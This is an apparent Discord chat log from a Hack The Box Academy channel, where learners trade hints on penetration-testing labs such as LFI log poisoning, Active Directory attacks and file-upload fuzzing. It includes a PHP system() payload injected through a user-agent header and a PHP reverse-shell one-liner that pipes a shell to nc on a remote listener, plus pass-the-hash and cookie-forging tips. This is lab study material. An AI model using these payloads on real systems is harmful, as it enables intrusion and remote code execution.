#modules

Expert tip

im making it send user agent as '<?php system("id"); ?>' and it wont work

Agreed because Ive stolen that tip from experts.

but it works when i make it send 'poisoning'

¯_(ツ)_/¯

worked for me

it returns this

/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1" 200 2235 "-" "'

but when I do 'poisoning' it returns

/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log HTTP/1.1" 200 2217 "-" "'poisoning'"

yeah thats the issue I was having when I tried with curl

but it Just Worked^tm for me in burp

good lord ran nmap on the next host after the inital host of AD and it took 15 mins to finish

is that with the embedded cmd, or with the $_GET version?

oh just remembered

you can load the error.log as well, and itll have if there was any issues with your php code

because your php errors will get logged there if something went wrong.

will note that typically if anything went wrong with my injection there I had to reset the box. Which is why Im annoyed that log injection seems to be the only route, cause it demands perfect payload or else you brick the vector.

but also true to life

The first irl LFI I found I bricked it, so oops.

embedded

like th one where its '<?php system("id"); ?>'

lemme try

try again with $_get version but reset the box first to clear all the logs. If it doesnt work, load the error.log and see what it says

k

hazah got the sql users remote workstation flag with 5 mins left

I made it way harder on myself.

like way harder

that was the general impression I got lol

its a bit messy in error log ill just reset the box rq (didnt make it clean)

honestly my biggest take away from the skill assessments for those was to not get too picky about my preferred methods. I got hung up on one of the sections because my preferred way didnt grab the info I needed. and also the module recommended way for one section had very little info on actually doing it and I had a hard time getting it work till I realized a popular different tool already had it baked in.

yeah it fills up fast, especially if in the same instance as all your precious enumeration for the first part

i sent a '<?php system("id"); ?>' agent head from burp to it

and in the error log there was more stuff but nothing useful

what did it say

2022/12/01 20:13:35 [error] 11#11: *21 open() "/var/www/html/ilf_admin/js/jquery.js" failed (2: No such file or directory), client: 10.244.5.13, server: _, request: "GET /ilf_admin/js/jquery.js HTTP/1.1", host: "159.65.89.136:31249", referrer: "http://159.65.89.136:31249/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log"

that looks like just an error from loading the full page

are you using the repeater method I mentioned?

oh

i forgot i left it on

ok gonna try again

yeah I leave it on just long enough to capture the first index.php request and then send it to repeater

the new error log hackthebox server wont let me send because it tells me dont send the same thing over over again

can i dm it to you

Hi, what are the ranks on htb, where can we see the list of all the ranks please

sure

Good evening! In the live engagement (shells and payloads) How can I use an exploit from exploitdb in the msfconsole! I get a permission denied error when typing "updatedb"

Sudo

@thorn urchin I know you mentioned Dante its 95 dollars off atm

oh snap

I dont see a discount for it

Is Pass the Ticket target borked for anyone else?

@thorn urchin sent the coupon code in a dm, looks like it covers the 1 time setup fee

Can't even ping that man. Not sure why.

Is there any one on one help a person can get for beginers. Im going through the readings but im having trouble naiagating and using the boxes.

There's a problem with the pwnboxes

Said support

is that it?

yeah some modules arent loading correctly it seems

I was having an issue

alright, vm it is. Thank you sirs

Np

Bah VMware expired

Heyo. I just read last posts. I have really hard times finishing Nibbles on Getting started. I get to the point when I generate host, and I'm about to upload PHP to my_images to create reverse shell. But then nothing changes in my_images. Netcat doesn't open any shell. And those servers keep falling down.

You got to move to the Starting Point chat this is Academy chat

Wrong section

Oh sorry.

ok

np lots of folks end up in this chat

@covert latch no this is the right place. Getting Started is a module and it walks you through nibbles

but unfortunately I remember nothing from that box so idr

ooo I was thinking the getting started on the main site

I think it might be on both

nibbles isna retired box

but also used for that module

There is a problem that even if I follow it step by step, nothing works. Even when I tried to use metasploit to get around, even some other php revershell scripts nothing works for me

And those generated hosts fall down after 15 minutes

And in pwnbox they didn't worked at all

So I was wondering if HTB has some issues

this been an ongoing issue or just today issue

cause HTB def having some issues today

I started it yesterday. But there I think worked well. And today I can't get through.

yeah it might just be todays issues messing with ya

Id take a break and check in after a couple hours or tomorrow

Oki! Also I was wondering. does .php file has to be named image.php? Because when I was trying to upload shell.php it didn't show there on list of files. If anyone knows?

web apps can vary but name should largely be unimportant outside of the extension

Okay thank you. Then it might be connected to todays issue they didn't upload.

Yeah Im having issues with the AD skills assessment 1 now that ive came back tried uploading chisel and it died

yeah everyone just go touch grass for a bit 😂

It would be strange, it's pitch dark outside 😄

night walks are the best

I have the same problem, can I dm you ?

sure

@pastel ginkgo use metasploit

For?

pivoting

without issues

I used chisel it worked perfectly

oh then i misunderstood

now im just trying to figure out how to get tools located on the machine now

Will anyone help with nudge in the right direction for Broken Auth: Skills Assessment?

I've found a user and a couple of cookies. I haven't been successfully decoded the cookies. Looks like they end up being ||MD5|| and I hit a wall.

||echo(base64_encode(md5('USER')) . 6 . base64_encode(md5('ROL')));||

@queen hatch

u dont have to decode

u have to try to cook one

thats what i have done

I figured decode to view the contents and work your way back up

Otherwise, I'd be guessing contents. But that makes sense. Ty!

Can anyone help me with 'Introduction to Bash Scripting : Flow Control - Branches' ? im not sure why the number i get for the salt is incorrect

idk why but I cant run any power view commands

did you Import-Module first?

Yup

@thorn urchin Where did you get your PowerView from? I can't get any powerview thing to work at all.

I didnt use powerview

How did you get bloodhound working then?

I got it on the remote system but it wants a database thing

hello hackers a lil guidance please.....Footprinting Hard Lab and I'm trying this command: "ssh -i private.key tom@10.129.53.210" with the key found in the imap server. But I got this error: 'Load key "private.key": error in libcrypto
tom@10.129.53.210: Permission denied (publickey). permissions have been changed. it worked on the easy lab, i dmissed something?

sounds like the key changed

do i have to retrieve the email with key everytime i get a new ip from htb?

uhh im very basic noob level but doesnt ssh need to generate the public key pair everytime, your private key may be the same and should be, but the public key is mutually negotiated using the private keys of the things trying to talk to eachother

actually the private key would change if its generating a session based key i think i dunno

not sure why an imap server would be storing a private key though thats some bad juju

What section are you working on? or did you get it figured out?

I need some help on cracking miscellaneous files and hashes. Anyone got me?

The skills assessment and I haven't yet

which course?

thanks the key is fine i redid the email it has to do with permissions or lists of known hosts

i used mousepad which worked on the easy lab?

sounds like you got it then?!

i havent done the module or any module actually so

could it be htb server. i noticed its acting funny

still get same error public key

did you chmod the key once you copied it over?

yes to private specs

Load key "private.key": error in libcrypto
tom@10.129.202.20: Permission denied (publickey).

got it, i wasnt copyin the the whole key. left out, BEGIN OPENSSH and END OPENSSH lol

nice

👍

thanks for the help!!

Ad Enumeration

Well.... I'll be asking you these question then! lol, I have not got that far yet... I have 5 more sections before I get to the skills assessment.

Yeah its a beast of the module the skill assment is pretty tough but doable im just stuck atm because I can't get powerview or bloodhound to play nice

the collection ingestor shouldnt need a database thing cause its what you feed to the database. iirc I used the python bloodhound ingestor over a chisel tunnel using the found creds.

Yeah I was getting stuck at bloodhounds login screen

@thorn urchin How did you get it to run over the proxy? Im getting errors saying it cant resolve the domain controller name even though its set in my host file

Having a bit of trouble with the question on https://academy.hackthebox.com/module/41/section/441 — seeing as this is the first section of the module, and we haven't been technically taught to deobfuscate JS code yet, I would naturally assume that the plaintext flag I can see in the obfuscated JS code is what I should be submitting to pass the question. However, it's balking at me that it's incorrect. The answer I'm providing is ||HTB{1_4m_7h3_53r14l_g3n3r470r}|| — am I missing something (non)obvious here?

Edit: Solved 🙂

proxychains and using the cmd flags to specify the DC iirc

yeah ive been trying || proxychains bloodhound-python -d INLANEFREIGHT.LOCAL -dc DC01.INLANEFREIGHT.LOCAL -c All -u xxxx -p xxxx ||

hmmm idr but try specifying the IP address for -dc

requires fqdn rip

lol

idk why lookup is failing

im about to go into my pihole server and set it there

oof yeah idr

yeah its not that

idk why its not working

ah here we go

try --nameserver and setting it to the DC ip

and maybe tack on --dns-tcp for good measure

your amazing

adding the tcp got it working

so entire command + nameserver and dns tcp

sounds about right

if it ran udp it timed out

I guessed right what type of attack the could preform

lol its microsoft everything has spyware and malware looool

that guy came back?

or you just really really scroll up?

no, hes just replying to a really old message lol

ah he's out here grave digging

uh ya I just logged back on so thats actually where my chat history left off and started me at

hmmmm

Could someone give me a hint to make the password mutation challenge complete a bit faster?

I let the original ask (use the resources.zip to create the mutated password.list file) run for 2ish hours with no luck, and am now attempting the challenge with the example list from the guide.

Break it into chucks || and start in the B's ||

Bro i need a teacher on HTB

i swear its pretty hard

but im in for it i baught the platinum since it comes with a 1000 cubes with the deal

Do you suggest I go back to the resources.zip file custom ruleset

You can break it into chunks using grep if I remember correctly

yo just asking how long should i spend a day on HTB im at highschool at the time so any advice

up to you and how interested you are in the subject

gotcha but reading it is a bit hard i wish it was a bit simple

for metric when a module says 1 day or so, it usually means 8 hours of solid study in the day. But background varies things a lot.

I see 8 hours is a day pretty much huh sucks for me i have a really bad attention span i doze off 30 seconds of focusing

Well youll need to either fix that or get a diagnosis and some meds to help with that

woah meds

otherwise itll be very hard to survive in this field

i see what you mean

can begin with diet

drug talk is banned from this server

oh

so no drugs sorry mod

but I can attest that wont be helpful either

but ya focus for significant lengths of times is absolute necesity

bro i just watched breaking bad its on my mind

I aint a mod, I got temp banned for talking about drugs so 😂

they take it seriously

oh

get off the processed foods/ fast foods, drugs, and porn and eat lots of homegrown fruits veggies and meat. Then youll be able to focus

yes when I'm totally intrested in something ill give it my entire attention it's pretty much instinct to just do it but when I'm not then that's the problem how can I take intrest in it I do have it but just looking at the reading part it says otherwise

Porn is oooof where i suffer

😆

@thorn urchin Im lost, I did the dc sync I got the administrators hash but I cant crack it.

thanks for giving the advice screen shoted it have a good day

idr exactly but unless the question specifically asks for the password probably dont need yo crack it. Hash is as good as a password often.

when all else fails just stay calm and enumerate

once you have dcsync theres usually not much enumeration left 😛

you cant kerbroast without the password of the user

trying to brain storm it but im stuck again lol

what module you working on?

and kerbroast sounds tasty is it seasoned with garlic and other herbs?

Hash as good as password was a hint 😉

ok I finally got it

idk why but after doing pth I wasnt able to access the remote site with cd \dc01.inlanefreight.htb\c$

but I was able to do net use x: \dc01.inlanefreight.local

and drill down from there to the flag

hey whatever works

get r done

im going to ask you tomorrow on how you got it working so I can add it to my notes lol

im rushing to take screen shots before my box goes down atm lol

Got to say that assessment was brutal but shit I learned alot

I can't get this damned password mutation challenge done with.
The box keeps timing out causing me to have to reset it.

I'm sure I'm doing something wrong.
I'm currently following what @pastel ginkgo suggested but I still can't even get through one .list file before the box expires.

HTB should give the option like THM to add more time to the box instead of just the option to reset it.

ive notticed though that if you keep active on the box even when time runs out it will still remain active for a longtime.

I've seen differently unfortunately.
Had a continuous ping running on the box while BFing it to test your theory out and the ping died when the box did. Hydra died soon after.

adding time isnt a feature on the academy but think on the main hack the box platform it allows you to to add time. I remember a few times being gone for days and coming back to a box and it was still up in the exact same state I left it.

thats because those boxes are public

if nobody resets it then they stay as they are. unless you have vip and get private instances

Well they should add it to the academy then, specially on boxes where we are (assumedly) supposed to be running longish-term brute-force operations on them 🙂

alot of times if you know the machine and its use or some other detail you can reduce your username list or passwordlist to more likely candiates and it will speed your brute forcing quite a bit.

that module specifically is just pretty terrible. Its not usually a problem outside that one module

also if youre trying against ssh youre gunna have a bad time, even though thats what it tells ya to do.

Agreed on both points.

I suppose I should be able to run the same attack against SMB 😛

🙂

which module password attacks? ya it was tough . Had to reference alot of material on the interwebs and lots of forum and sicord help to get though it.

is there anyone can help on the question "Predictable Reset Token"?

its not tough, its just annoying and wastes your time

Specifically the password mutation piece

its the worse module in the whole course so far

ya smb and ftp allow for much better brute forcing you can really cracnk up hydra with ftp

-t 64 for the win!

but youll feel like a pro at password cracking after you complete it

eh not really

a pro hydra script kiddo haha

just not really how youd go about things in the real world most of the time

the mutations thing a bit, but not that extreme except for offline cracking, theres better targeted wordlist methods if you really wanna go that route(that lightly is covered in a different module), password spraying methods are far more common.

the file and hash cracking stuff is a bit more common, but a little lite in the module imo

😆

just download some leet passwordlist from some other experienced hacker

the pass the hash and pass the ticket sections that got recently added are thr most valuable parts of the whole module

def have those notes good cause youll use em in the AD module for sure

noted

Feeling kinda dumb: On Using the Metasploit Framework :Sessions ...ive run nmap in so many configurations including different firewall and IDS evasion techniques ...and im going a bit wild. the web server isnt being run on the common ports and im stark out of ideas that dont take a 24hr long nmap scan that i cant do due to target time limit. lol pls hlp

Hi, I am stuck at the last question on AD skills assessment 1. I got tp***y user and password hash and administrator hash. How did you get access to dc01? I tried pth on mimikatz did not work . Could someone gimme a hint?

I think I have been at this too long today.... Is there a way to get a NTLM hash in powershell without using tools like mimikatz or powerview etc? I got the answer to the module I am working on (attacking domain Trusts child -> Parent Trusts from linux) using linux, but the question's wording makes me think I should be doing it from the shell I got on the DC in powershell...

is there anyone can DM me?

message me

do you recommend any other subscription services to go with HTB Academy? Is TryHackMe the only one I can add in? I don't think TryHackMe is good for learning is why I'm asking because it really seems like you learn a topic and never use it again on THM

is there a good reason to do both HTB Academy and THM at same time?

what is another place I can go to that is similar to complement HTB Academy?

now how tf do i do this shit

I stopped thm for quite a long time. HTB's content is much better. If you've already finished most academy modules, you can start HTB. hackmyvm is also a good place to go.

I’m still doing basics of HTB Academy. Is doing TryHackMe and HTB Academy concurrently to reinforce basics a complete waste of time?

I’m thinking to reinforce fundamentals

I've completed 222 rooms on thm, to be honest, no specific room gives me an unforgettable memory.

Ok

Would learning Python be better?

To do concurrently?

Or earning CompTIA certs?

as for academy, there's only 2 or 3 modules left, cuz i think it's kinda expensive for the cubes.

Ok

which path or module in htb teaches how to hack?

i just started it

I have a student subscription to Academy

Both job role paths teach how to hack

:o

welp i dont have those many cubes

how to earn em

But CPTS job role path is preferably done after information security fundamentals path

....?

I have a programming background, so I would definitely suggest you learn python.

you have to buy them

ik python tho

buy the cubes-

ah fck

i found it cheaper to buy the sub

cant we do it without

buying

?

you can;t unlock tier3\4 modules with subscription.

ohh your talking about non-academy stuff

how to get more cubes without buyiung em

you cant

The tier 0 modules only cost 10 cubes and refund 10 cubes on completion, a fresh academy account gives you 10 cubes. So theres a number of modules you can do for free so long as you actually finish em.

So what would be a good complement to HTB Academy while learning? Python?

I was gonna pick between TryHackMe in addition to HTB Academy or do HTB Academy and Python on side

What do you think?

I’m starting to think HTB Academy and Python is good enough?

Learning both sounds good to me. You'll use python daily but.... Tbh. I can't program. I can only read/understand sorta. Can still hack tho

Hello can I dm someone for broken authentication->brute forcing passwords? I have a couple of days stuck in that section thanks!

Module: Getting started
Part: Initial foothold
Problem: Can't open reverse shell.

Greetings again. Server is now working well, but I have diferent problem. I will keep it short. I can login to Nibbleblog. but problem is that if I upload anything else named then image.php it doesn't show on /content/private/plugins/my_image dir. And if I upload image.php file it changes but when I try curl or open file through firefox it won't open reverse shell on my netcat. It just processes and then nothing. I'm stuck on this and I do not know what to do else. I read here in history some poeple had similar issues, were there some solutions to them?

I tried PWN box thinking that there might be problem with my system, that it might block reverseshell but when I try open generated website in pwnbox it say connection has timed out in browser.

@covert latch maybe u did not set the reverse shell in the correct way

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 9443 >/tmp/f"); ?>

I have ti copy pasta in image.php file

From HTB

nc is listening on 9443

but I tried to put verbose on curl now and it says this

• Trying 10.129.162.210:80...
• Connected to 10.129.162.210 (10.129.162.210) port 80 (#0)

GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1
Host: 10.129.162.210
User-Agent: curl/7.85.0
Accept: /

• Mark bundle as not supporting multiuse
  < HTTP/1.1 200 OK
  < Date: Fri, 02 Dec 2022 08:53:23 GMT
  < Server: Apache/2.4.18 (Ubuntu)
  < Content-Length: 0
  < Content-Type: text/html; charset=UTF-8
  <
• Connection #0 to host 10.129.162.210 left intact

@covert latch try to create a php reverse shell

I thought it is that one on top. That code which is put in .php file and then upload to images

No

Oh? I thought it was 😳

DM me if you still need help with it

anyone can help on Q2 of Predictable Reset Token?

heres the qus

i did everything correctly but i got no flags

for that one zap stuff was so bad i wasn't able to do that in zap (just give it a try and it work this time but burp is still better) burp is so much better for that so use also there is only 17 username in the username wordlist so you can try it manually for sanity check

sure shoot me a dm if you still need help with that

Hello I try to connect via pwnbox on spawned machine. I wait for 10 minutes and the spawned machine is no up. No scannable. Anyone have this problem ?

which module are you on? it i think i have the same issue on the Attacking Enterprise Networks module

Hey guys, I'm having problems with the question on File Upload Attacks - Blacklist Filters. Could someone help? Thanks 😄

sure what's the issue?

I'm running burp with an extension wordlist to check on which ones are allowed and which aren't, the problem is all of them are reporting a 200 reply

When I try to upload them I am met with an error

I think there is an on-going issue with academy modules of where connecting via ssh just isnt happening. its just holding. - currently i am on the Active Directory Enum stage

that's the code even if it failed the page will still load so you still always get a 200

look in the length

They all say File successfully uploaded though

They all give out the same length

i got the same issue on the Attacking Enterprise Networks module

anyone can help on Q2 of Predictable Reset Token?

been the same since 6am.

here try this #modules message

for me it's been 2 day

oh wow ok!

all of the one that have docker target seem to be working fine

which section are you on?

i'm solving the question 2

oh

any feedback from HTB on the issue?

Looking at length on the burp responses

oh wait then what's the issue?

i don't think the academy have one, there is one on the main site, if there is then i got no idea how to check but we could try to ask support

Same on WordPress hacking and active directory i think it's à big issue

if every request show the same code and length then i think you should check the fuzz request

i don't have idea what to do next after decoding

hint change the ||role||

always on the day i commit myself lol

same 🤣

back to the drawing board then i guess

Hihi!

Hope everyone is having a wonderful day : D

Ho if you have unreachable like this change your vpn to academy 1 and restart both machines

im running directly from the instance...

im going to attempt a reset again

@vital adder can i DM you?

sure

@distant oar can I dm?

Im having this issue as well. Running straight from the instance. Glad i looked on here, thought i was doing something wrong

hi i am new

@sharp stumphi

Can someone help me out with windows priv esc module? In the SeDebug privilege section. The exercise says navigate to computer settings > windows settings > security settings, but neither my host or remote windows boxes have those options. I mean I have settings > windows & security but nothing in their looks like what's in the example.

can anyone tell me how to use http proxy injector

?

the Forgot box? ask that in #boxes

Yes but change the vpn of the instance

Oh sry just condused the channels

no worries 👍

your username is kinda familiar also i think that's in windows server only or something, i can't remember which version is the target windows is but if it's a windows server it should have that (i think) but you don't need to do that part to complete this section

which module and section are you on?

anyone help me at section interrogating... https://academy.hackthebox.com/module/81/section/787 ? idk what the awnser is on the first questions

i need some help understanding something in the Nmap module IDS/IPS evasion

so im trying to scan the target using a different Ip source , with the -S flag , and specifying the interface to tun0 , but the result is weird , the nmap reply with failed to determine route to target ! , i looked into the "routing table" and it seems everything is ok , looked into the nmap official docs and nothing checks out , so whoever has some knowledge in this please help

Hello, can somebody help me with Command Injection Skills Assessment, I have found the HTB forum, but it doesn't really help. Can you write to DM, I'll send to you my screenshots

~~Can I get a hint for Broken Auth Skill Assessment?

I'm stuck with error ||User support cannot have requested role||. Not sure where to go from here. I'm also not sure if I should know what to do with ||htb_sessid_persistent|| yet.~~

Hint: Figured out country code. I'm able to move forward again.

Hello, Can someone help me to find What is admin email address in IMAP/POP23 in foot-printing module?

Enumerate all of the open ports. If you need further help you can dm so no spoilers are given

Hello,
Any issues with the platform at the moment? Network connectivity mainly.

There are issues with the Pwnbox across all platforms if that is what you're referring to. I haven't noticed problems with anything else

Getting an issue with a retired box is all. 100% htb side unfortunately.

This is for HTB Academy. You can ask in #boxes , reset the box, or contact tech support on HTB

k

Hello, can somebody help me with Command Injection Skills Assessment, I have found the HTB forum, but it doesn't really help. Can you write to DM, I'll send to you my screenshots

I'm really curious how you manager to take blurry screenshots

Anyway, the issue is that you're not injecting any command really. Your command just comes as text after the argument

That's сhopped quality, if you want I could give full screenshots, but a bit later

You need to separate it into 2 commands

@solar granite hey man, do you have any idea why the -S command cannot work in my case ?

I've no idea what you are talking about

.

is there someone can DM about "Work on webapp at URL /question2/ and try to bypass the login form using one of the method showed. What is the flag? " under weak bruteforce protection > insecure protection

As you can see, I tried ||, &&, ; and %60 to separate that, but it doesn't really helped🙃

I can't quite see properly, it's too blurry. I only spent time on the first pic, where there's no operators. Anyway, finding out which operators work is a big part of command injection. ||&&|| should work if memory serves

Hm... I write you to dm, when will be free, ok?

Sure

Does it work without the -S? I just tried and -S ... -e tun0 works fine for me

so weird , i tried 2 machines till now and it didnt work , and yes it does work without the -S flag

all nmap flags are working without this tiny monster , but if you tried it on academy boxes i guess i cant complain

Nevermind

I'm not very familiar with how -S works exactly, but I tested previously with a known IP on my network

I just did a test again with the same IP you used (10.129.2.200) and I got the same failed to determine route to 127.0.0.1 error

I'd guess the spoofed IP needs to have a route to the target IP

yup it seems i got that wrong , its not that well explained i must say

anyway thanks for the effort man ! really appreciate it

Thank you, I just wasted an hour trying to enumerate the version, lifesaver

anyone experiencing problems with starting an instance?

when i try to start one it won't work and i get the error 'request validation failed' : /

you connected on OpenVPN?

no

https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access

But I don't need to connect to openvpn to start an instance in the webinterface? It worked before.

I think that's the point of spawning an instance in the browser?

are you VIP?

Student license

@limpid raft you can try clearing cache and data?

Oh that worked, weird. Thanks!

so i been stuck on module Nmap , Section IDS/IPS evasion "Firewall bypass" for 6 hours , and cant get the answer right , i was reading alot in the nmap site so that's why , anyway something in the module is not really explained well and nmap site didn't speak much of it , im stuck since long time now and i need help i get response from the target using other method to bypass but the answer is still wrong 🙂 .......

its working with a decoy , but the OS detection is probably wrong cause the answer is wrong and the other example just like i discussed with @solar granite is not working because of some issue with the routing "and i cant figure that out even if i tried to add something to the routing table i dont know what it should be because the -S Flag itself not well explained ! "

why are you using decoys and spoofed source addresses? Theyre useless in modern scanning, and you wont get any responses back from spoofing the source IP address if you dont control the address youre spoofing too to collect the results.

now spoofing the source port can be helpful, but not the source address

Decoys were used back in the day for plausible deniability when scanning wasnt as common and thus more scrutinized as well as a lack of easy access to VPS and proxy hosts to mask the origin of the scan. So the decoy option was useful to throw up a bunch of noise that made it harder to pinpoint the attacker. Nowadays its kinda pointless and doesnt do much for firewall or ids evasion. Its a relic of the 90s when it was implemented. It honestly shouldnt even be taught anymore.

sounds good , but what should i do then to not be detected ? im trying split the packets into small fragments and that's working for not getting detected , but ... the answer of the OS still wrong !! 😑

you can always go slower 🙂

Please i need help with introducción nosqlinjectiom

well im waiting for the scan to finish im using the -mtu 16 option , the -f is too slow !

overcomplicating things

you can adjust the raw rate

why do i have this shitty username

it was Faster ! not much detectable for the machine i was trying on , but the results still the same , no OS detection

Thanks for the tip tho , i never thought i will ever try that !

@fierce pond which section are you on btw?

the firewall/ids evasion section doesnt have a practical section, and then there are three labs, Easy, Medium, and Hard

Good evening! Im having trouble with the live engagement labs :( :( I cant manage to use the exploitdb module in the msfconsole 😦 😦 😦

The Easy one XD

it got me crazy so i didn't pass it , i thought i might learn stuff while doing so ... but it has been a long time and i cant figure it out !

youre super overthinking it then

script scan can get it no evasion necessary

it doesnt want the exact os version, it just wants the distro name

You are digging too deep! Happen to me first but the "distro" hint is worth gold!

Yup

if its any consolation the medium and hard labs should go a bit easier for you since they do require a bit more of the overthinking youve been trying

well i guess i will finish today then if that's the case , thanks for the Help , really appreciate it

np

also random note to whoever needs it in the file uploads module: their recommended route of burp intruder is dumb, recall your lessons from the ffuf module and use that instead. Save the request file and fuzz for your extensions and what not.

especially nice in the parts where you have many valid uploadable extensions, but only one of them will actually execute code. Itll want you to go by them one by one but thats stupid. If you fuzz the upload with ffuf and your payload, then you can turn around and do a similar fuzz on the url param with your cmd=id or whatever and fuzz the same extension at the file upload location, which will make the correct upload that executes code stand out.

its a MUCH saner approach than whats taught in the module and more comprehensive to boot.

so youll have a bunch of shell.php3, shell.php4, ect uploaded and then youre cycling through them when testing which one is the one you need for the challenge too instead of doing it by hand like a monkey.

Hello i have the same problem how did you solve it

Edit:solved

This has downsides too, like, how df I am supposed to know what headers to include, and creating such ffuf post request is not easy and quick

thats why I said save the request from burp to a file

which is covered in the ffuf module

I didn't do that module yet

Can you use FUZZ variable in the file with entire request?

yes

not gunna say my way is always the best way, but if you dont have burp pro, it will be better than using burp intruder every time always.

Madf0x you and MrTom are the unofficial heroes of this chat lol

thanks 🙂

at the very least the takeaway is dont be afraid of trying a better method you know just because its not whats taught, especially if its something you HAVE been taught in a previous module because it might be fair game or even expected in the final assessment

Hey guys, having a bit of trouble wit Shoppy after the initial foothold, anyone can give me a nudge please?

Read #welcome and verify your account. Then go to #boxes

Man hate asking for help on this one but struggling a bit in the FFUF module (BRB 1 sec then ill finish)

well I was just preaching ffuf

Haha yea I've read through it a coupel times and i've got to be missing something really small

@thorn urchin Did you ever get this error after building chisel on your linux box? I didnt get this yesterday with my windows build

I used the pre installed chisel for my Linux side of things, and only the built one for the windows stuff

okay so on page fuzzing our goal is to find the /blog pages etc etc.

I've tried
ffuf -w /wordlist -u <ip>/blogFUZZ
I've also tried <ip/blog/FUZZ as well as <ip>/blog/Fuzz_1.Fuzz2

I've found a 403 .phps for extension but have not found anything else with FFUF

its saying you should try searching for various index pages to see what framework its running

so you want something more like /blog/indexFUZZ assuming youre using thr web extensions wordlist

ahh I did not try that

then when you find out what ones are accepted you can swap things around

I see that now just passed the Fuzz_1.Fuzz_2

and do a /blog/FUZZ.ext while feedining it the common directories and files wordlist

you can do it both ways with FUZZ1.FUZZ2 but itll take awhile as itll do every combination of both and you have to specify the two wordlists with the correct identifiers.

Yea i gave up at 1 million

lol

Okay let me work with this a bit ty

I was on right track just neede to try a little more

the web extensions one also adds a period too iirc, in which case youd actually want FUZZ1FUZZ2 or else youll get results like blah..php which some webservers are okay with some arent

@thorn urchin gonna pm for clarification

Im starting to see why @thorn urchin it took you so long to do the 2nd skills assessment I havent even found any users hash yet lol

I was able to enumerate some users but nothing else lol

assessment 1 is just a warm up, assessment 2 is the real test

oof

start with the very very basics

every pentesters favorite first tools to run once on an internal network.

I dont think this applies to this module but the evil ssdp is pretty neat https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices

i have having trouble with the MSSQL queries for footprinting medium can some one give me a hint or make sure im on the right track.

is there a way to reset module progress?

Are you receiving a [-] module 'lib' has no attribute 'SSL_CTX_set_ecdh_auto'?

or are you already past login and trying to execute queries

no im going through hacktricks MSSQL commands to query the db but stuck

I'll dm because I don't want to give away spoilers

@thorn urchin is it something really simple to get the first user hash?

yeah

it does take a few minutes though

I've tried nmap, various forms of smb stuff, responder variants

why responder variants

like I ran responder for almost 45 mins

I tried the tcp dump as well as responder

responder from the foothold right?

yup

on the 172 port

sure ya didnt just miss the results?

yeah I legit ran it for 45 mins came back and didnt get anything

maybe module bugged

odd

like responder was legit my first idea

ran it then made another window to do nmap scans

cause def took awhile but 45 minutes is a little long

i'll reset it and try again

my metasploit book just got here in the mail

give it a read while I wait

@thorn urchin just got the hash, it was bugged

👍

For the Footprint module , ms SQL I’m getting this error

Is there any other way to login mssql

This error for mssql-cli command

sounds like you either have some old packages or some borked python libs

i.e not a tool issue, your kali VM is having issues

Any other way to fix it ? I don’t wanna change my VM, I made everything installed for CREST CRT 😅

load the clean VM snapshot you should totally still have right and then try to update it and run from that forked instance

Will check that

otherwise update all packages and try reinstalling impacket from scratch

with a venv

Yup , I remove python aswell

i both agree and disagree with this yes burp community intruder is kinda useless without being able to filter but if you only get one hit or only need to test one thing then i would say burp is a bit better (but this is the repeater) but if you get multiple hit and need to test multiple thing all at once then ffuf is 100% better also was you able to get ffuf work for this? if you did pls send me the command i was only able to get it work with curl and a bash loop

yeah burp repeater is awesome for testing, but for the automation stuff ffuf like you said works better which is the exact situation I was describing

and Im still at work, remind me in 3 hours and I ought to be able to send over my steps

oh off the top of my head, did you use -request-proto http? cause ffuf tries to force ssl, but the docker box only supports regular http, that may be why it didnt work

So I've ben subscribed to HTB academy for last 10 ish months and it seems like i've just been kicked out?

'How can I see what happened / why?

contact support?

Yea will do is there a help channel here or I guess email

oh i didn't have to use that my only issue was i wasn't able the get ffuf to load the stuff right (i did load it through burp and i just can't get the parameter with the name to load right)

contact support via email

well if youre using -request and request file you do have to use -request-proto

otherwise you just get errors for each result

oh i just use the -u for the url the -request is kinda weird for me

yeah not using -request would be a nightmare to setup

oh

ohhhh that's for loading from a file

why tf didn't i think of that i'm dumb

cause using a request file means all the headers and post parameters are all gunna be filled out exactly the same way burp repeater does it, you just modify what you want and plug FUZZ where you want ffuf to do its thing

I used -u for when I was testing the actual shell commands after the uploads, but for the upload itself, I used a request file

make sense

Not finished with the module yet, but I suspect the approach will work for the majority if not all of the following sections I havnt done yet

So odd i was on student subscription and literally died/ got kicked out lol

Side question, Silver Annual Plan seems to only unlock up to lvl 2, is there a version of that that gives access to higher level modules? Or do I just have to buy all of thos individually?

what you see is what you can get😂

so basically Silver Annual and Student give you up to (including) Tier II which I think are the best deals. Especially if you can afford the Silver Annual because it comes with exam attempts

Yea I was just on student and then it was seemingly just removed

Tier III, IV, and V you'll need to buy cubes individually or use the ones you earn from completing Tiers 0, I, and II

did the subscription end?

Yea i was just doing modules and it unsubscribed etc

not sure what happened

I mean was today the end of your subscription

Does student only have like a certain timeline?

I think ive been subscribed 9/10 months?

idk

but sadly only recently started using a bunch

also based on the prices... if you don't have a subscription plan it's a whole lot cheaper to buy one instead of purchasing cubes (and you get Pwnbox usage with it).

i.e. 1000 cubes is $100. But you can purchase Platinum for $68 which comes with 1000 cubes and unlimited Pwnbox usage

yea trying to math it out, but I think by the end of this month I've got time to commit and hopefully take CBBH early january

so kinda annoying ><

ahhaha I don't think you understand what I'm trying to say. I don't think HTB Academy has a limit on the amount of times you can subscribe to a plan.

The subscription is monthly. SO what I mean is did your monthly subscription end and you need to renew? or was there some time left

I've been subscribed for like 10 months same method for payment, I dont actually know why it ended

Yea might just have to triple subscribe and unlock everything and get to work.

mhmm what does it say under the student plan

doesnt allow me to subscribe ot student anymore

weird.. I'd say contact support. Usually when it grays out it mean it doesn't recognize your email as a university email.

Yea just kinda odd / unsure

yea I had changed my email to a personal email once I finished school earlier this year. So guess it makes sense

that is exactly why then. I'd assume today was the last day of your subscription and when it went to renew the plan it noticed you were no longer using a student email and, therefore, you cannot purchase that plan.

was hoping to be able to pay student but its all good just find the most economical way forward and keep working

You'll either need to add your student email back if you still have access OR pay for a different plan.

Yea dont have access anymore, did you say you can triple stack?

subscriptions?

I.E I can triple subscrib the 68 / month so i can get access to waht I need?

